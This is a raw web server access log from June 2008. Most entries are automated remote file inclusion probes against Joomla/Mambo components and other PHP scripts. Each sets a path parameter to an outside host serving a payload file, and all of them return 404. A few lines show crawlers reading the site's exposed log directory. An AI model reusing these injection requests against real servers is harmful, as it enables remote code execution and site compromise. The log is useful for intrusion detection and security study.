212.227.251.172 - - [22/Jun/2008:17:01:48 -0700] "GET /scanhttp://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
212.227.251.172 - - [22/Jun/2008:17:01:52 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
66.249.65.164 - - [22/Jun/2008:17:02:38 -0700] "GET /logs/access.log HTTP/1.1" 200 438 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.collegiateforum.org"
66.249.65.164 - - [22/Jun/2008:17:03:16 -0700] "GET /logs/scripts.log HTTP/1.1" 200 1073477 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.collegiateforum.org"
65.55.210.232 - - [22/Jun/2008:17:06:38 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.collegiateforum.org"
65.55.210.232 - - [22/Jun/2008:17:06:38 -0700] "GET /logs/ HTTP/1.1" 200 4942 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.collegiateforum.org"
195.117.241.196 - - [22/Jun/2008:17:07:27 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://binbrain.com/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
195.117.241.196 - - [22/Jun/2008:17:07:27 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://binbrain.com/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
195.117.241.196 - - [22/Jun/2008:17:07:27 -0700] "GET /logs/access_071224.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://binbrain.com/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
24.187.99.124 - - [22/Jun/2008:17:07:45 -0700] "GET /logs/access.log HTTP/1.0" 200 1812 "http://www.collegiateforum.org/logs/access.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.collegiateforum.org"
24.187.99.124 - - [22/Jun/2008:17:08:06 -0700] "GET /logs/access.log HTTP/1.0" 200 2072 "http://www.collegiateforum.org/logs/access.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.collegiateforum.org"
64.22.89.194 - - [22/Jun/2008:17:08:08 -0700] "GET /logs/access_080324.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
64.22.89.194 - - [22/Jun/2008:17:08:09 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
64.22.89.194 - - [22/Jun/2008:17:08:09 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
67.85.92.181 - - [22/Jun/2008:17:08:10 -0700] "GET /logs/access.log HTTP/1.0" 200 3047 "http://www.collegiateforum.org/logs/access.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:17:08:18 -0700] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:17:08:23 -0700] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
208.43.113.99 - - [22/Jun/2008:17:08:28 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://mx-skane.net//cache/xml/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
208.43.113.99 - - [22/Jun/2008:17:08:28 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://mx-skane.net//cache/xml/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:17:08:29 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:17:08:34 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:17:08:34 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:17:08:40 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
92.112.195.152 - - [22/Jun/2008:17:08:55 -0700] "GET http://www.collegiateforum.org/logs/access.log HTTP/1.0" 200 5205 "http://www.collegiateforum.org/logs/access.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.collegiateforum.org"
92.112.195.152 - - [22/Jun/2008:17:08:55 -0700] "GET / HTTP/1.0" 200 918 "http://www.collegiateforum.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.collegiateforum.org"
92.112.195.152 - - [22/Jun/2008:17:08:56 -0700] "GET / HTTP/1.0" 200 918 "http://www.collegiateforum.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:17:10:05 -0700] "GET /logs/access.log/index1.php?pagina=http://sistemas.unilestemg.br/ping/a.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:17:10:05 -0700] "GET /index1.php?pagina=http://sistemas.unilestemg.br/ping/a.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:17:10:11 -0700] "GET /logs/access.log/index1.php?pagina=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:17:10:12 -0700] "GET /index1.php?pagina=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
216.239.91.165 - - [22/Jun/2008:17:11:21 -0700] "GET /logs/access.log/index.php?site=http://yourmynumberone.com/mx5club/images/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
216.239.91.165 - - [22/Jun/2008:17:11:21 -0700] "GET /index.php?site=http://yourmynumberone.com/mx5club/images/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
216.239.91.165 - - [22/Jun/2008:17:11:21 -0700] "GET /logs/index.php?site=http://yourmynumberone.com/mx5club/images/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
216.239.91.165 - - [22/Jun/2008:17:11:21 -0700] "GET /logs/access.log/index.php?site=http://yourmynumberone.com/mx5club/images/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
216.239.91.165 - - [22/Jun/2008:17:11:21 -0700] "GET /index.php?site=http://yourmynumberone.com/mx5club/images/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
216.239.91.165 - - [22/Jun/2008:17:11:21 -0700] "GET /logs/index.php?site=http://yourmynumberone.com/mx5club/images/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
216.239.91.165 - - [22/Jun/2008:17:11:21 -0700] "GET /logs/access.log/index.php?site=http://yourmynumberone.com/mx5club/images/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
216.239.91.165 - - [22/Jun/2008:17:11:21 -0700] "GET /index.php?site=http://yourmynumberone.com/mx5club/images/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
216.239.91.165 - - [22/Jun/2008:17:11:21 -0700] "GET /logs/index.php?site=http://yourmynumberone.com/mx5club/images/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
216.239.91.165 - - [22/Jun/2008:17:11:22 -0700] "GET /logs/access.log/index.php?site=http://yourmynumberone.com/mx5club/images/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
216.239.91.165 - - [22/Jun/2008:17:11:22 -0700] "GET /index.php?site=http://yourmynumberone.com/mx5club/images/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
216.239.91.165 - - [22/Jun/2008:17:11:22 -0700] "GET /logs/index.php?site=http://yourmynumberone.com/mx5club/images/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
202.179.0.195 - - [22/Jun/2008:17:13:32 -0700] "GET /logs/access_080324.log/components/com_performs/performs.php?mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.collegiateforum.org"
202.179.0.195 - - [22/Jun/2008:17:13:36 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.collegiateforum.org"
202.179.0.195 - - [22/Jun/2008:17:13:40 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.collegiateforum.org"
189.18.141.167 - - [22/Jun/2008:17:15:29 -0700] "GET /logs/index.php?site=http://www.troop66nm.org/image/response1??? HTTP/1.0" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.collegiateforum.org"
189.18.141.167 - - [22/Jun/2008:17:15:32 -0700] "GET /index.php?site=http://www.troop66nm.org/image/response1??? HTTP/1.0" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.collegiateforum.org"
202.179.0.195 - - [22/Jun/2008:17:16:30 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.collegiateforum.org"
89.108.91.166 - - [22/Jun/2008:17:16:43 -0700] "GET /logs/access_071224.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
89.108.91.166 - - [22/Jun/2008:17:16:43 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
89.108.91.166 - - [22/Jun/2008:17:16:43 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
89.108.91.166 - - [22/Jun/2008:17:17:10 -0700] "GET /logs/access_071231.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
64.34.164.227 - - [22/Jun/2008:17:18:04 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.34.164.227 - - [22/Jun/2008:17:18:06 -0700] "GET /logs/access_071224.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.34.164.227 - - [22/Jun/2008:17:18:07 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.34.164.227 - - [22/Jun/2008:17:18:55 -0700] "GET /logs/access_071231.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
59.188.5.164 - - [22/Jun/2008:17:26:10 -0700] "GET /logs/access_080324.log/scanhttp://www.exceldozai.com//mambots/system/idnews.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
59.188.5.164 - - [22/Jun/2008:17:26:11 -0700] "GET /scanhttp://www.exceldozai.com//mambots/system/idnews.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
59.188.5.164 - - [22/Jun/2008:17:26:11 -0700] "GET /logs/scanhttp://www.exceldozai.com//mambots/system/idnews.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
202.179.0.195 - - [22/Jun/2008:17:26:12 -0700] "GET /logs/access_080324.log/components/com_performs/performs.php?mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.collegiateforum.org"
202.179.0.195 - - [22/Jun/2008:17:26:15 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.collegiateforum.org"
202.179.0.195 - - [22/Jun/2008:17:26:19 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.collegiateforum.org"
202.179.0.195 - - [22/Jun/2008:17:29:19 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.collegiateforum.org"
201.217.93.91 - - [22/Jun/2008:17:30:42 -0700] "GET /logs/access_080505.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.camerasreview.org/head.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
59.188.5.164 - - [22/Jun/2008:17:31:18 -0700] "GET /logs/access.log/scanhttp://www.exceldozai.com//mambots/system/idnews.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "collegiateforum.org"
59.188.5.164 - - [22/Jun/2008:17:31:19 -0700] "GET /scanhttp://www.exceldozai.com//mambots/system/idnews.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "collegiateforum.org"
59.188.5.164 - - [22/Jun/2008:17:31:19 -0700] "GET /logs/scanhttp://www.exceldozai.com//mambots/system/idnews.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:17:31:55 -0700] "GET /logs/access_080324.log/index2.php?x=http://sistemas.unilestemg.br/ping/a.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:17:31:55 -0700] "GET /index2.php?x=http://sistemas.unilestemg.br/ping/a.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:17:31:57 -0700] "GET /logs/access_080324.log/index2.php?x=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:17:31:57 -0700] "GET /index2.php?x=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:17:32:02 -0700] "GET /logs/access.log/index1.php?x=http://sistemas.unilestemg.br/ping/a.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:17:32:02 -0700] "GET /logs/access.log/index1.php?x=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:17:32:02 -0700] "GET /index1.php?x=http://sistemas.unilestemg.br/ping/a.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:17:32:02 -0700] "GET /index1.php?x=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:17:32:03 -0700] "GET /logs/access_080107.log/index1.php?x=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:17:32:03 -0700] "GET /index1.php?x=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:17:32:03 -0700] "GET /logs/access_080107.log/index1.php?x=http://sistemas.unilestemg.br/ping/a.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:17:32:03 -0700] "GET /index1.php?x=http://sistemas.unilestemg.br/ping/a.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:17:32:18 -0700] "GET /logs/access_080107.log/index2.php?x=http://sistemas.unilestemg.br/ping/a.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:17:32:21 -0700] "GET /logs/access_080107.log/index2.php?x=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:17:34:03 -0700] "GET /logs/access.log/main.php?x=http://sistemas.unilestemg.br/ping/a.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:17:34:03 -0700] "GET /main.php?x=http://sistemas.unilestemg.br/ping/a.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:17:34:06 -0700] "GET /logs/access.log/main.php?x=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:17:34:06 -0700] "GET /main.php?x=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:17:34:28 -0700] "GET /logs/access.log/index2.php?pagina=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:17:34:28 -0700] "GET /index2.php?pagina=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:17:34:33 -0700] "GET /logs/access.log/index2.php?pagina=http://sistemas.unilestemg.br/ping/a.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:17:34:33 -0700] "GET /index2.php?pagina=http://sistemas.unilestemg.br/ping/a.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
66.249.65.164 - - [22/Jun/2008:17:37:04 -0700] "GET /Jonathan_Fantini_Porter/contact.php HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.collegiateforum.org"
66.249.65.164 - - [22/Jun/2008:17:37:05 -0700] "GET /Jonathan_Fantini_Porter/uk.php HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:17:37:09 -0700] "GET /logs/access_080324.log//include.php?path[docroot]=http://sistemas.unilestemg.br/ping/a.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:17:37:09 -0700] "GET //include.php?path[docroot]=http://sistemas.unilestemg.br/ping/a.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
66.249.65.164 - - [22/Jun/2008:17:37:10 -0700] "GET /Jonathan_Fantini_Porter/publish.php HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:17:37:10 -0700] "GET /logs/access_080324.log//include.php?path[docroot]=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:17:37:10 -0700] "GET //include.php?path[docroot]=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
66.249.65.164 - - [22/Jun/2008:17:37:34 -0700] "GET /logs/access_080609.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.collegiateforum.org"
66.249.65.164 - - [22/Jun/2008:17:37:40 -0700] "GET /logs/access_080616.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.collegiateforum.org"
64.34.164.227 - - [22/Jun/2008:17:40:40 -0700] "GET /logs/access.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
89.108.91.166 - - [22/Jun/2008:17:41:07 -0700] "GET /logs/access_080310.log//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
89.108.91.166 - - [22/Jun/2008:17:41:07 -0700] "GET /logs//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
89.108.91.166 - - [22/Jun/2008:17:41:09 -0700] "GET //joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
89.108.91.166 - - [22/Jun/2008:17:41:20 -0700] "GET /logs/access_080303.log//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
64.34.164.227 - - [22/Jun/2008:17:42:30 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://membres.lycos.fr/youyoussniper/scaner/ishi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
66.223.106.116 - - [22/Jun/2008:17:43:50 -0700] "GET /logs/access_071224.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
66.223.106.116 - - [22/Jun/2008:17:43:51 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
66.223.106.116 - - [22/Jun/2008:17:43:51 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:17:43:57 -0700] "GET /logs/access.log/send_reminders.php?includedir=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:17:43:58 -0700] "GET /send_reminders.php?includedir=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:17:43:58 -0700] "GET /logs/send_reminders.php?includedir=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:17:46:36 -0700] "GET /logs/access_071231.log/index.php?menu=deti&page=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.181.105.117 - - [22/Jun/2008:17:46:36 -0700] "GET /logs/access.log/index.php?pag=http://yourmynumberone.com/mx5club/images/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:17:46:36 -0700] "GET /index.php?menu=deti&page=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:17:46:36 -0700] "GET /logs/index.php?menu=deti&page=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.181.105.117 - - [22/Jun/2008:17:46:37 -0700] "GET /index.php?pag=http://yourmynumberone.com/mx5club/images/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
202.181.105.117 - - [22/Jun/2008:17:46:38 -0700] "GET /logs/index.php?pag=http://yourmynumberone.com/mx5club/images/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
